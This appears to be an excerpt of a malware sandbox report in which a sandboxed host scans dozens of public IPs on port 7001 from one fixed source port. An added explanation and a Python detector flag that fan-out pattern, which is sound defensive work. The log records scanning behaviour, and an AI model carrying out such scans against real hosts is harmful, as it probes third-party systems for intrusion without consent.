          Source: unknownNetwork traffic detected: HTTP traffic on port 54926 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 59066 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57112 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 47442 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 43672 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 49144 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 44522 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57112 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 39574 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 54926 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34154 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 43672 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 7001 -> 44522
          Source: unknownNetwork traffic detected: HTTP traffic on port 35992 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41256 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50734 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50468 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 52570 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57910 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 37548 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 7001 -> 44522
          Source: unknownNetwork traffic detected: HTTP traffic on port 51654 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 47442 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34374 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 39574 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 59510 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 53966 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35992 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50468 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 49144 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 56182 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57112 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 58764 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 37548 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 39574 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51568 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 54926 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 43672 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35992 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50468 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 37548 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50734 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41256 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 47442 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 39574 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 44378 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 49144 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 33306 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57112 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 36168 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 43296 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 37548 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 39846 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 55604 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 60594 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 39274 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 36168 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 45530 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 52702 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 45622 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 43672 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35992 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50468 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 44008 -> 7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 208.40.66.59:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 183.92.55.108:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 95.1.13.86:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 174.130.55.141:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 169.25.75.118:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 122.175.244.149:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 92.230.45.67:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 57.168.128.107:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 5.145.175.97:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 154.51.255.28:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 168.62.4.154:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 166.17.25.172:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 38.62.20.21:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 88.237.62.216:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 179.188.147.51:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 181.201.55.14:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 32.53.64.111:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 38.85.194.25:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 31.204.37.250:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 222.177.193.176:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 216.51.105.208:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 223.165.244.64:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 180.189.104.86:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 60.12.23.23:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 145.76.11.116:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 144.226.186.117:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 180.238.125.91:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 34.107.25.116:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 47.71.177.94:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 166.238.211.136:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 52.28.135.79:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 124.131.147.16:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 151.36.47.49:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 142.171.135.69:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 63.253.124.208:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 61.37.236.161:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 67.111.122.124:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 69.195.20.112:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 161.193.114.33:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 209.10.205.79:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 199.111.169.191:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 59.114.153.48:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 206.32.14.71:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 221.71.74.130:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 152.219.177.45:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 95.246.174.135:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 154.146.77.25:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 197.83.9.205:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 121.93.197.221:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 133.18.196.168:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 163.242.20.127:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 43.162.39.185:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 61.102.231.183:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 204.73.101.83:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 179.62.203.233:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 85.103.49.133:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 19.141.110.111:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 222.159.93.224:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 27.6.17.58:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 203.92.83.201:7001
Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 138.33.161.128:7001
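Two things stand out in the traffic entries above. Every "TCP traffic" line leaves the sandbox host from the same local source port (39345) and goes to a different remote host on 7001/tcp; a normal client takes a fresh ephemeral source port per connection, so one fixed source port fanning out across many destinations is the signature of a stateless SYN scanner rather than of a program making ordinary connections. The "HTTP traffic on port" lines are the sessions that did get set up, almost all client-to-7001, with only a handful of 7001-to-client replies. 7001/tcp is the default Oracle WebLogic listener port, but the report does not identify the target service, so that remains an inference. The script below is an added example, not part of the sandbox report, that extracts both patterns from lines in this format; it works on either the fused "global trafficTCP traffic:" text or the column-separated form. The fan-out threshold of 10 hosts and the two 203.0.113.5 control flows are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample input. The 7001 lines are copied from the report above;
# the two 203.0.113.5 lines are made up as a control (fresh source port per
# connection, as a normal client behaves) and are NOT from the report.
SAMPLE_LINES = [
    "Source: unknown | Network traffic detected: HTTP traffic on port 39846 -> 7001",
    "Source: unknown | Network traffic detected: HTTP traffic on port 36806 -> 7001",
    "Source: unknown | Network traffic detected: HTTP traffic on port 41346 -> 7001",
    "Source: unknown | Network traffic detected: HTTP traffic on port 7001 -> 41346",
    "Source: unknown | Network traffic detected: HTTP traffic on port 39846 -> 7001",
    "Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 208.40.66.59:7001",
    "Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 183.92.55.108:7001",
    "Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 95.1.13.86:7001",
    "Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 174.130.55.141:7001",
    "Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 169.25.75.118:7001",
    "Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 122.175.244.149:7001",
    "Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 92.230.45.67:7001",
    "Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 57.168.128.107:7001",
    "Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 5.145.175.97:7001",
    "Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 154.51.255.28:7001",
    "Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 168.62.4.154:7001",
    "Source: global traffic | TCP traffic: 192.168.1.100:39345 -> 166.17.25.172:7001",
    # Control flows (constructed, not from the report).
    "Source: global traffic | TCP traffic: 192.168.1.100:51234 -> 203.0.113.5:443",
    "Source: global traffic | TCP traffic: 192.168.1.100:51235 -> 203.0.113.5:443",
]

# Both patterns are searched anywhere in the line, so the fused extraction
# text ("global trafficTCP traffic: ...") parses the same as the separated form.
FLOW_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}):(\d+) -> (\d{1,3}(?:\.\d{1,3}){3}):(\d+)")
PORT_RE = re.compile(r"traffic on port (\d+) -> (\d+)")


def parse_flows(lines):
    """(src_ip, src_port, dst_ip, dst_port) for every 'TCP traffic' line."""
    flows = []
    for line in lines:
        m = FLOW_RE.search(line)
        if m:
            flows.append((m.group(1), int(m.group(2)), m.group(3), int(m.group(4))))
    return flows


def parse_port_pairs(lines):
    """(from_port, to_port) for every 'HTTP traffic on port A -> B' line."""
    pairs = []
    for line in lines:
        m = PORT_RE.search(line)
        if m:
            pairs.append((int(m.group(1)), int(m.group(2))))
    return pairs


def fixed_source_port_fanout(flows, min_targets=10):
    """Map (src_ip, src_port, dst_port) -> sorted list of distinct destination
    hosts, keeping only triples that reach at least min_targets hosts.
    One source port reused across many destinations is the scanner signature;
    the control flows use a fresh port per connection and never qualify."""
    targets = defaultdict(set)
    for src_ip, src_port, dst_ip, dst_port in flows:
        targets[(src_ip, src_port, dst_port)].add(dst_ip)
    return {k: sorted(v) for k, v in targets.items() if len(v) >= min_targets}


def sessions_to_port(pairs, service_port):
    """Distinct client-side ports that connected to service_port, and the
    number of lines where service_port is the sending side (i.e. the remote
    host actually answered)."""
    clients = {a for a, b in pairs if b == service_port}
    responses = sum(1 for a, b in pairs if a == service_port)
    return clients, responses


FLOWS = parse_flows(SAMPLE_LINES)
PORT_PAIRS = parse_port_pairs(SAMPLE_LINES)

if __name__ == "__main__":
    for (src_ip, src_port, dst_port), hosts in fixed_source_port_fanout(FLOWS).items():
        print(f"scan: {src_ip}:{src_port} -> {len(hosts)} hosts on tcp/{dst_port}")
    clients, responses = sessions_to_port(PORT_PAIRS, 7001)
    print(f"sessions to 7001: {len(clients)} client ports, {responses} replies from 7001")
```

Run against the full report rather than the sample, the same functions would show one (192.168.1.100, 39345, 7001) key with every destination host in the list; lowering `min_targets` to 2 or 3 is enough to catch the pattern in shorter captures, while raising it trims false positives from services that legitimately reuse a bound source port.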